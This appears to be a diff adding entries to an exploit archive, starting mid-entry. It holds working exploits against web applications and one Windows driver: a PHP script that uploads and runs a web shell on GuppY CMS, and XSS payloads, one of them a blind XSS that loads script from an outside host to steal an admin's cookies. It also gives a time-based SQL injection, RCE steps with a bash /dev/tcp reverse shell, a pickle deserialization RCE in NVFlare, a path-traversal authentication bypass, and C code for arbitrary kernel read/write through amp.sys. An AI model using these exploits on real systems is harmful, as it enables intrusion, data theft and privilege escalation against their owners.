Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="105", "Chromium";v="105"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
```
[+]Response:
```Request
<script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/dist/js/manifest.js"></script>
<script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/dist/js/vendor.js"></script>
<script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/dist/js/app.js"></script>
<script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/js/main.js"></script>
<script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/js/theme.js"></script>
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/LavaLite)
## Proof and Exploit:
[href](https://streamable.com/nis1hg)
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

124
exploits/php/webapps/51052.txt Normal file
View file

@ -0,0 +1,124 @@
# Exploit Title: GuppY CMS v6.00.10 - Remote Code Execution
# Date: Sep 30, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.freeguppy.org/
# Software Link:
https://www.freeguppy.org/fgy6dn.php?lng=en&pg=279927&tconfig=0#z2
# Version: 6.00.10
# Tested on: Linux
#!/usr/bin/php
<?php
$username = "Admin2"; //Administrator username
$password = "rose1337"; //Administrator password
$options = getopt('u:c:');
if(!isset($options['u'], $options['c']))
die("\n GuppY 6.00.10 CMS Remote Code Execution \n Author: Chokri Hammedi
\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n
\n");
$target = $options['u'];
$command = $options['c'];
// Administrator login
$cookie="cookie.txt";
$url = "{$target}guppy/connect.php";
$postdata = "connect=on&uuser=old&pseudo=".$username."&uid=".$password;
$curlObj = curl_init();
curl_setopt($curlObj, CURLOPT_URL, $url);
curl_setopt($curlObj, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curlObj, CURLOPT_HEADER, 1);
curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt ($curlObj, CURLOPT_POSTFIELDS, $postdata);
curl_setopt ($curlObj, CURLOPT_POST, 1);
CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);
CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);
CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);
CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);
curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");
curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");
$result = curl_exec($curlObj);
// uploading shell
$url2 = "{$target}guppy/admin/admin.php?lng=en&pg=upload";
$post='------WebKitFormBoundarygA1APFcUlkIaWal4
Content-Disposition: form-data; name="rep"
file
------WebKitFormBoundarygA1APFcUlkIaWal4
Content-Disposition: form-data; name="ficup"; filename="shell.php"
Content-Type: application/x-php
<?php system($_GET["cmd"]); ?>
------WebKitFormBoundarygA1APFcUlkIaWal4--
';
$headers = array(
'Content-Type: multipart/form-data;
boundary=----WebKitFormBoundarygA1APFcUlkIaWal4',
'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36',
'Accept-Encoding: gzip, deflate',
'Accept-Language: en-US,en;q=0.9'
);
curl_setopt($curlObj, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curlObj, CURLOPT_URL, $url2);
curl_setopt($curlObj, CURLOPT_POSTFIELDS, $post);
curl_setopt($curlObj, CURLOPT_POST, true);
curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);
CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);
CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);
CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);
CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);
curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");
curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");
$data = curl_exec($curlObj);
// Executing the shell
$shell = "{$target}guppy/file/shell.php?cmd=" .$command;
curl_setopt($curlObj, CURLOPT_URL, $shell);
curl_setopt($curlObj, CURLOPT_HTTPHEADER, array('Content-Type:
application/x-www-form-urlencoded'));
curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, False);
CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);
curl_setopt($curlObj, CURLOPT_HEADER, False);
curl_setopt($curlObj, CURLOPT_POST, false);
$exec_shell = curl_exec($curlObj);
$code = curl_getinfo($curlObj, CURLINFO_HTTP_CODE);
if($code != 200) {
echo "\n\n \e[5m\033[31m[-]Something went wrong! \n [-]Please check the
credentials\n";
}
else {
print("\n");
print($exec_shell);
}
curl_close($curlObj);
?>

63
exploits/php/webapps/51054.txt Normal file
View file

@ -0,0 +1,63 @@
# Exploit Title: Bus Pass Management System 1.0 - Cross-Site Scripting (XSS)
# Date: 2022-07-02
# Exploit Author: Ali Alipour
# Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql
# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip
# Version: 1.0
# Tested on: Windows 10 Pro x64 - XAMPP Server
# CVE : CVE-2022-35155
#Issue Detail:
The value of the searchdata request parameter is copied into the HTML document as plain text between tags. The payload cyne7<script>alert(1)</script>yhltm was submitted in the searchdata parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
# Vulnerable page: /buspassms/download-pass.php
# Vulnerable Parameter: searchdata [ POST Data ]
#Request :
POST /buspassms/download-pass.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=s5iomgj8g4gj5vpeeef6qfb0b3
Origin: https://127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: https://127.0.0.1/buspassms/download-pass.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 25
searchdata=966196cyne7%3cscript%3ealert(1)%3c%2fscript%3eyhltm&search=
#Response :
HTTP/1.1 200 OK
Date: Fri, 01 Jul 2022 00:14:25 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.8
X-Powered-By: PHP/7.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6425
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="en">
<head>
<title>Bus Pass Management System || Pass Page</title>
<script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLba
...[SNIP]...
<h4 style="padding-bottom: 20px;">Result against "966196cyne7<script>alert(1)</script>yhltm" keyword </h4>
...[SNIP]...

69
exploits/php/webapps/51056.txt Normal file
View file

@ -0,0 +1,69 @@
# Exploit Title: Authenticated Sql Injection in ImpressCMS v1.4.3
# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
# Date: 7th March 2022
# CVE ID: CVE-2022-26986
# Confirmed on release 1.4.3, this vulnerability is patched in the version 1.4.4 and above...
# Vendor: https://www.impresscms.org
# Source: https://github.com/ImpressCMS/impresscms/releases/tag/v1.4.3
###############################################
#Step1- Login with Admin Credentials
#Step2- Vulnerable Parameter to SQLi: mimetypeid (POST request):
POST /ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype&op=mod&mimetypeid=1 HTTP/1.1
Host: 192.168.56.117
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------40629177308912268471540748701
Content-Length: 1011
Origin: http://192.168.56.117
Connection: close
Referer: http://192.168.56.117/ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype&op=mod&mimetypeid=1
Cookie: tbl_SystemMimetype_sortsel=mimetypeid; tbl_limitsel=15; tbl_SystemMimetype_filtersel=default; ICMSSESSION=7c9f7a65572d2aa40f66a0d468bb20e3
Upgrade-Insecure-Requests: 1
-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="mimetypeid"
1 AND (SELECT 3583 FROM (SELECT(SLEEP(5)))XdxE)
-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="extension"
bin
-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="types"
application/octet-stream
-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="name"
Binary File/Linux Executable
-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="icms_page_before_form"
http://192.168.56.117/ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype
-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="op"
addmimetype
-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="modify_button"
Submit
-----------------------------40629177308912268471540748701--
Vulnerable Payload:
1 AND (SELECT 3583 FROM (SELECT(SLEEP(5)))XdxE) //time-based blind (query SLEEP)
Output:
web application technology: Apache 2.4.52, PHP 7.4.27
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
available databases [6]:
[*] impresscms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test

27
exploits/php/webapps/51057.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution
# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
# Date: 7th March 2022
# CVE ID: CVE-2022-26982
# Confirmed on release 2.1.1
# Vendor: https://download.simplemachines.org/
# Note- Once we insert the vulnerable php code, we can even execute it without any valid login as it is not required! We can use it as a backdoor!
###############################################
#Step1- Login with Admin Credentials
#Step2- Goto Admin=>Main=>Administration Center=>Configuration=>Themes and Layout=>Modify Themes=>Browse the templates and files in this theme.=>Admin.template.php
#Step3- Now add the vulnerable php reverse tcp web shell exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.1/4477 0>&1'"); ?>
#Step4- Now Goto Add Media=>Add Resource=> Upload php web shell and click on SAVE CHANGES at the bottom of the page
#Step5- Now click on "Themes and Layout" and you will get the reverse shell:
E.g: Visit http://IP_ADDR/index.php?action=admin;area=theme;b4c2510f=bc6cde24d794569356b81afc98ede2c2 and get the reverse shell:
listening on [any] 4477 ...
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 41276
bash: cannot set terminal process group (1334): Inappropriate ioctl for device
bash: no job control in this shell
daemon@debian:/opt/bitnami/simplemachinesforum$ whoami
whoami
daemon
daemon@debian:/opt/bitnami/simplemachinesforum$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon@debian:/opt/bitnami/simplemachinesforum$

28
exploits/php/webapps/51058.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: Abantecart v1.3.2 - Authenticated Remote Code Execution
# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
# Date: 3rd Mar'2022
# CVE ID: CVE-2022-26521
# Confirmed on release 1.3.2
# Vendor: https://www.abantecart.com/download
###############################################
#Step1- Login with Admin Credentials
#Step2- Uploading .php files is disabled by default hence we need to abuse the functionality:
Goto Catalog=>Media Manager=>Images=>Edit=> Add php in Allowed file extensions
#Step3- Now Goto Add Media=>Add Resource=> Upload php web shell
#Step4- Copy the Resource URL location and execute it in the browser e.g. :
Visit //IP_ADDR/resources/image/18/7a/4.php (Remove the //) and get the reverse shell:
listening on [any] 4477 ...
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 34532
Linux debian 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64 GNU/Linux
11:17:51 up 2:15, 1 user, load average: 1.91, 1.93, 1.52
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
bitnami tty1 - 09:05 1:05m 0.20s 0.01s -bash
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
daemon
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
$

20
exploits/php/webapps/51059.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution
# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
# Date: 26th Feb'2022
# CVE ID: CVE-2022-26149
# Confirmed on release 2.8.3-pl
# Reference: https://github.com/sartlabs/0days/blob/main/Modx/Exploit.txt
# Vendor: https://modx.com/download
###############################################
#Step1- Login with Admin Credentials
#Step2- Uploading .php files is disabled by default hence we need to abuse the functionality:
Add the php file extension under the "Uploadable File Types" option available in "System Settings"
#Step3- Now Goto Media=>Media Browser and upload the Shell.php
#Step4- Now visit http://IP_Address/Shell.php and get the reverse shell:
listening on [any] 4477 ...
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 58056
bash: cannot set terminal process group (1445): Inappropriate ioctl for device
bash: no job control in this shell
daemon@debian:/opt/bitnami/modx$

69
exploits/php/webapps/51060.txt Normal file
View file

@ -0,0 +1,69 @@
# Exploit Title: Composr-CMS Version <=10.0.39 - Authenticated Remote Code Execution
# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
# Date: 12th January,2022
# CVE ID: CVE-2021-46360
# Confirmed on release 10.0.39 using XAMPP on Ubuntu Linux 20.04.3 LTS
# Reference: https://github.com/sartlabs/0days/blob/main/Composr-CMS/Exploit.py
# Vendor: https://compo.sr/download.htm
###############################################
#Step1- We should have the admin credentials, once we logged in, we can disable the php file uploading protection, you can also do this manually via Menu- Tools=>Commandr
#!/usr/bin/python3
import requests
from bs4 import BeautifulSoup
import time
cookies = {
'has_cookies': '1',
'PHPSESSID': 'ddf2e7c8ff1000a7c27b132b003e1f5c', #You need to change this as it is dynamic
'commandr_dir': 'L3Jhdy91cGxvYWRzL2ZpbGVkdW1wLw%3D%3D',
'last_visit': '1641783779',
'cms_session__b804794760e0b94ca2d3fac79ee580a9': 'ef14cc258d93a', #You need to change this as it is dynamic
}
headers = {
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': '*/*',
'Origin': 'http://192.168.56.116',
'Referer': 'http://192.168.56.116/composr-cms/adminzone/index.php?page=admin-commandr',
'Accept-Language': 'en-US,en;q=0.9',
}
params = (
('keep_session', 'ef14cc258d93a'), #You need to change this as it is dynamic
)
data = {
'_data': 'command=rm .htaccess', # This command will delete the .htaccess means disables the protection so that we can upload the .php extension file (Possibly the php shell)
'csrf_token': 'ef14cc258d93a' #You need to change this as it is dynamic
}
r = requests.post('http://192.168.56.116/composr-cms/data/commandr.php?keep_session=ef14cc258d93a', headers=headers, params=params, cookies=cookies, data=data, verify=False)
soup = BeautifulSoup(r.text, 'html.parser')
#datap=response.read()
print (soup)
#Step2- Now visit the Content=>File/Media Library and then upload any .php web shell (
#Step 3 Now visit http://IP_Address/composr-cms/uploads/filedump/php-reverse-shell.php and get the reverse shell:
┌─[ci@parrot]─[~]
└──╼ $nc -lvvnp 4444
listening on [any] 4444 ...
connect to [192.168.56.103] from (UNKNOWN) [192.168.56.116] 58984
Linux CVE-Hunting-Linux 5.11.0-44-generic #48~20.04.2-Ubuntu SMP Tue Dec 14 15:36:44 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
13:35:13 up 20:11, 1 user, load average: 0.00, 0.01, 0.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
user :0 :0 Thu17 ?xdm? 46:51 0.04s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
daemon
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
$ pwd
/
$

28
exploits/php/webapps/51061.txt Normal file
View file

@ -0,0 +1,28 @@
Exploit Title: PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS
# Date: 2022-10-02
# Exploit Author: Prasheek Kamble
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/
# Version: V 1.2
# Vulnerable endpoint: http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php
# Tested on MAC OS, XAMPP
Steps to reproduce:
1) Navigate to http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php
2) Fill the form and Enter xss payload "><script src=https://prasheekk05.xss.ht></script> in address field
3) Click on Add Details and intercept the request in Burpsuite
4) After this, the details have been submitted.
5) As soon as admin(Victim) receives our request, when he clicks on it to verify our form, the XSS payload gets fired.
6) Now attacker get's the details of victim like ip address, cookies of Victim, etc
7) So attacker is sucessful in getting the victim's ip address and other details.
#POC's
https://ibb.co/kSxFp2g
https://ibb.co/VvSVRsy
https://ibb.co/mSGp4FX
https://ibb.co/hXbJ9TZ
https://ibb.co/M6vS08S

73
exploits/python/remote/51051.txt Normal file
View file

@ -0,0 +1,73 @@
# Exploit Title: NVFLARE < 2.1.4 - Unsafe Deserialization due to Pickle
# Exploit Author: Elias Hohl
# Google Dork: N/A
# Date: 2022-06-21
# Vendor Homepage: https://www.nvidia.com
# Software Link: https://github.com/NVIDIA/NVFlare
# Version: < 2.1.4
# Tested on: Ubuntu 20.04
# CVE : CVE-2022-34668
https://medium.com/@elias.hohl/remote-code-execution-in-nvidia-nvflare-c140bb6a2d55
There is a Remote Code Execution vulnerability https://github.com/NVIDIA/NVFlare. It is possible to execute arbitrary commands on the server for connected clients. It was not investigated if server can also execute commands on all clients (I expect this though, as it is by design required for the server to instruct the clients to execute commands if they need to train specific models). The consequence would be that a client can gain Remote Code Execution on the server an ALL connected clients.
The vulnerability exists due to the deserialization of user data with the pickle module. There are multiple places where this is done, I considered line 568 on private/fed/server/fed_server.py the occurrence that is accessible with the least efforts and thus used it in my PoC-Exploit.
The client generates a malicious data packet like this: aux_message.data["fl_context"].CopyFrom(bytes_to_proto(generate_payload('curl http://127.0.0.1:4321')))
REPLICATION
This example uses the server in poc-mode. The provision mode seems to run the same code in fed_server.py though and should be vulnerable as well. (To my understanding, the modes differ only regarding credentials).
This exploit replicates the Quickstart tutorial https://nvidia.github.io/NVFlare/quickstart.html with a maliciously modified client to execute commands on the server.
Make sure to use Python 3.8, the nightly builds don't work with Python >=3.9.
sudo apt update
sudo apt-get install python3-venv curl
python3 -m venv nvflare-env
source nvflare-env/bin/activate
python3 -m pip install -U pip
python3 -m pip install -U setuptools
python3 -m pip install torch torchvision tensorboard
git clone https://github.com/NVIDIA/NVFlare.git
cd NVFlare
git checkout 2.1.2
git apply nvflare-exploit-apply.txt # note that this only modifies the client side code
python3 -m pip install .
cd
poc -n 2
mkdir -p poc/admin/transfer
cp -rf NVFlare/examples/* poc/admin/transfer
In four separate terminals, execute (after running source nvflare-env/bin/activate in each one):
./poc/server/startup/start.sh
./poc/site-1/startup/start.sh
./poc/site-2/startup/start.sh
./poc/admin/startup/fl_admin.sh localhost
In another terminal window, fire up a netcat instance to verify that Remote Code Execution is possible:
nc -lvp 4321
In the admin console, execute:
check_status server
to verify both clients are connected. Then:
submit_job hello-pt-tb
It will take a few minutes until the job finishes downloading the required files, then you should see a connection in the netcat tab and error messages in the server tab (because the received pickle payload is no data that the program can continue working with). You can also shutdown netcat, which will result in "Connection refused" errors in the server tab.

35
exploits/python/webapps/51041.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: "camp" Raspberry Pi camera server 1.0 - Authentication Bypass
# Date: 2022-07-25
# Exploit Author: Elias Hohl
# Vendor Homepage: https://github.com/patrickfuller
# Software Link: https://github.com/patrickfuller/camp
# Version: < bf6af5c2e5cf713e4050c11c52dd4c55e89880b1
# Tested on: Ubuntu 20.04
# CVE : CVE-2022-37109
"camp" Raspberry Pi camera server Authentication Bypass vulnerability
https://medium.com/@elias.hohl/authentication-bypass-vulnerability-in-camp-a-raspberry-pi-camera-server-477e5d270904
1. Start an instance of the "camp" server:
python3 server.py --require-login
2. Fetch the SHA-512 password hash using one of these methods:
curl http://localhost:8000/static/password.tx%74
OR
curl http://localhost:8000/static/./password.txt --path-as-is
OR
curl http://localhost:8000/static/../camp/password.txt --path-as-is
3. Execute the following python snippet (replace the hash with the hash you received in step 2).
from tornado.web import create_signed_value
import time
print(create_signed_value("5895bb1bccf1da795c83734405a7a0193fbb56473842118dd1b66b2186a290e00fa048bc2a302d763c381ea3ac3f2bc2f30aaa005fb2c836bbf641d395c4eb5e", "camp", str(time.time())))
4. In the browser, navigate to http://localhost:8000/, add a cookie named "camp" and set the value to the result of the script from step 3, then reload the page. You will be logged in.

166
exploits/windows/local/51044.txt Normal file
View file

@ -0,0 +1,166 @@
/*
# Exploit Title: System Mechanic v15.5.0.61 - Arbitrary Read/Write
# Date: 26-09-2022
# Exploit Author: Brandon Marshall
# Vendor Homepage: https://www.iolo.com/
# Tested Version - System Mechanic version 15.5.0.61
# Driver Version - 5.4.11 - amp.sys
# Tested on OS - 64 bit Windows 10 (18362)
# Fixed Version - System Mechanic 17.5.0.116
# CVE : CVE-2018-5701
*/
#include <iostream>
#include <Windows.h>
#include <psapi.h>
#include <stdio.h>
#pragma warning(disable:4996)
typedef struct _kernelDriverInformation {
char* imageName;
void* imageBase;
}kernelDriverInformation, * PKernelDriverInformation;
typedef struct _functionInformation {
char* functionName;
void* functionOffset;
void* functionBase;
}functionInformation, * PFunctionInformation;
void callDeviceIoControl(HANDLE deviceHandle, void* inputBuffer, DWORD inputBufferSize) {
DWORD bytesReturned;
NTSTATUS status = DeviceIoControl(deviceHandle, 0x226003, inputBuffer, inputBufferSize, NULL, NULL, (LPDWORD)&bytesReturned, (LPOVERLAPPED)NULL);
}
HANDLE getDeviceHandle(char* name) {
DWORD generic_read = 0x80000000;
DWORD generic_write = 0x40000000;
HANDLE handle = CreateFileA((LPCSTR)name, GENERIC_READ | generic_write, NULL, NULL, 0x3, NULL, NULL);
return handle;
}
void* CreateWriteAddresInAMPsKernelMemoryIOCTLBuffer(void* addressToDereference, SIZE_T bufferSize) {
byte* maliciousBuffer = (byte*)malloc(bufferSize);
*(ULONGLONG*)maliciousBuffer = (ULONGLONG)5; // funciton pointer, this will be 5
*(ULONGLONG*)(maliciousBuffer + 0x8) = (ULONGLONG)(maliciousBuffer + 0x20); //(maliciousBuffer); pointer to parameters
*(ULONGLONG*)(maliciousBuffer + 0x10) = (ULONGLONG)(maliciousBuffer + 0x10); //(maliciousBuffer + 0x20);// (0x1); pointer to write return value
*(ULONGLONG*)(maliciousBuffer + 0x18) = (ULONGLONG)0;//(ULONGLONG)(maliciousBuffer + 0x40); // unknown
*(ULONGLONG*)(maliciousBuffer + 0x20) = (ULONGLONG)16; // this will be 16
*(ULONGLONG*)(maliciousBuffer + 0x28) = (ULONGLONG)0; // param2
*(ULONGLONG*)(maliciousBuffer + 0x30) = (ULONGLONG)addressToDereference; // param3
*(ULONGLONG*)(maliciousBuffer + 0x38) = (ULONGLONG)0; // param4
return (void*)maliciousBuffer;
}
void* CreateReadDWORDFromKernelMemoryLeakIOCTLBuffer(SIZE_T bufferSize) {
byte* maliciousBuffer = (byte*)malloc(bufferSize);
*(ULONGLONG*)maliciousBuffer = (ULONGLONG)5; // funciton pointer, this will be 5
*(ULONGLONG*)(maliciousBuffer + 0x8) = (ULONGLONG)(maliciousBuffer + 0x20); //(maliciousBuffer); pointer to parameters
*(ULONGLONG*)(maliciousBuffer + 0x10) = (ULONGLONG)(maliciousBuffer + 0x10); //(maliciousBuffer + 0x20);// (0x1); pointer to write return value
*(ULONGLONG*)(maliciousBuffer + 0x18) = (ULONGLONG)0;//(ULONGLONG)(maliciousBuffer + 0x40); // unknown
*(ULONGLONG*)(maliciousBuffer + 0x20) = (ULONGLONG)16; // this will be 16
*(ULONGLONG*)(maliciousBuffer + 0x28) = (ULONGLONG)2; // param2
*(ULONGLONG*)(maliciousBuffer + 0x30) = (ULONGLONG)(maliciousBuffer + 0x40); // param3
*(ULONGLONG*)(maliciousBuffer + 0x38) = (ULONGLONG)(maliciousBuffer + 0x48); // param4
*(ULONGLONG*)(maliciousBuffer + 0x40) = (ULONGLONG)0; //unknown
*(ULONGLONG*)(maliciousBuffer + 0x48) = 0xffffffff; // param1
return (void*)maliciousBuffer;
}
void* CreateWriteDWORDFromKernelMemoryIOCTLBuffer(void* addressToWriteTo, SIZE_T bufferSize) {
byte* maliciousBuffer = (byte*)malloc(bufferSize);
*(ULONGLONG*)maliciousBuffer = (ULONGLONG)5; // funciton pointer, this will be 5
*(ULONGLONG*)(maliciousBuffer + 0x8) = (ULONGLONG)(maliciousBuffer + 0x20); //(maliciousBuffer); pointer to parameters
*(ULONGLONG*)(maliciousBuffer + 0x10) = (ULONGLONG)(maliciousBuffer + 0x10); //(maliciousBuffer + 0x20);// (0x1); pointer to write return value
*(ULONGLONG*)(maliciousBuffer + 0x18) = (ULONGLONG)0;//(ULONGLONG)(maliciousBuffer + 0x40); // unknown
*(ULONGLONG*)(maliciousBuffer + 0x20) = (ULONGLONG)16; // this will be 16
*(ULONGLONG*)(maliciousBuffer + 0x28) = (ULONGLONG)2; // param2
*(ULONGLONG*)(maliciousBuffer + 0x30) = (ULONGLONG)addressToWriteTo; // param3
*(ULONGLONG*)(maliciousBuffer + 0x38) = (ULONGLONG)(maliciousBuffer + 0x40); // param4
*(ULONGLONG*)(maliciousBuffer + 0x40) = (ULONGLONG)0xffffffff;
return (void*)maliciousBuffer;
}
DWORD leakDWORD(void* addressToLeak, HANDLE deviceHandle, SIZE_T bufferSize) {
void* writeAddresInAMPsKernelMemoryIOCTLBuffer = CreateWriteAddresInAMPsKernelMemoryIOCTLBuffer(addressToLeak, bufferSize);
callDeviceIoControl(deviceHandle, writeAddresInAMPsKernelMemoryIOCTLBuffer, bufferSize);
free(writeAddresInAMPsKernelMemoryIOCTLBuffer);
//address should now be written in kernel memory
void* ReadDWORDFromKernelMemoryLeakIOCTLBuffer = CreateReadDWORDFromKernelMemoryLeakIOCTLBuffer(bufferSize);
callDeviceIoControl(deviceHandle, ReadDWORDFromKernelMemoryLeakIOCTLBuffer, bufferSize);
DWORD returnVal = *(DWORD*)((byte*)ReadDWORDFromKernelMemoryLeakIOCTLBuffer + 0x40);
free(ReadDWORDFromKernelMemoryLeakIOCTLBuffer);
return returnVal;
}
void writeDWORD(void* addressToWrite, void* PDWORDToWrite, HANDLE deviceHandle, SIZE_T bufferSize) {
void* writeAddresInAMPsKernelMemoryIOCTLBuffer = CreateWriteAddresInAMPsKernelMemoryIOCTLBuffer(PDWORDToWrite, bufferSize);
callDeviceIoControl(deviceHandle, writeAddresInAMPsKernelMemoryIOCTLBuffer, bufferSize);
free(writeAddresInAMPsKernelMemoryIOCTLBuffer);
//address should now be written in kernel memory
void* ReadDWORDFromKernelMemoryLeakIOCTLBuffer = CreateWriteDWORDFromKernelMemoryIOCTLBuffer(addressToWrite,bufferSize);
callDeviceIoControl(deviceHandle, ReadDWORDFromKernelMemoryLeakIOCTLBuffer, bufferSize);
free(ReadDWORDFromKernelMemoryLeakIOCTLBuffer);
return;
}
void* leakQWORD(void* addressToLeak, HANDLE deviceHandle, SIZE_T bufferSize) {
DWORD firstDWORD = leakDWORD(addressToLeak, deviceHandle, bufferSize);
DWORD secondDWORD = leakDWORD((byte*)addressToLeak + 0x4, deviceHandle, bufferSize);
void** Pqword = (void**)malloc(0x8);
for (int i = 0; i < 4; i++) {
((byte*)Pqword)[i] = ((byte*)&firstDWORD)[i];
((byte*)Pqword)[i + 4] = ((byte*)&secondDWORD)[i];
}
return (*(void**)Pqword);
}
void writeQWORD(void* addressToWrite, void* QWORDToWrite, HANDLE deviceHandle, SIZE_T bufferSize) {
writeDWORD(addressToWrite, QWORDToWrite, deviceHandle, bufferSize);
writeDWORD((byte*)addressToWrite + 0x4, ((byte*)QWORDToWrite + 0x4), deviceHandle, bufferSize);
}
int main(int argc, char* argv[])
{
ULONGLONG addressToReadorWrite = strtoull(argv[2], NULL, 16);
HANDLE deviceHandle = getDeviceHandle((char*)"\\\\.\\AMP");
SIZE_T size = 0x300;
if (strcmp(argv[1], "read") == 0) {
void* leakedQWORD = leakQWORD((void*)addressToReadorWrite, deviceHandle, size);
printf("Value stored at virtual address %0llx is %0llx", addressToReadorWrite, leakedQWORD);
}
else if (strcmp(argv[1], "write") == 0) {
ULONGLONG QWORDToWrite = strtoull(argv[3], NULL, 16);
writeQWORD((void*)addressToReadorWrite, (void*)&QWORDToWrite, deviceHandle, size);
printf("Wrote %0llx to virtual address %0llx", QWORDToWrite, addressToReadorWrite);
}
}

21
files_exploits.csv
View file

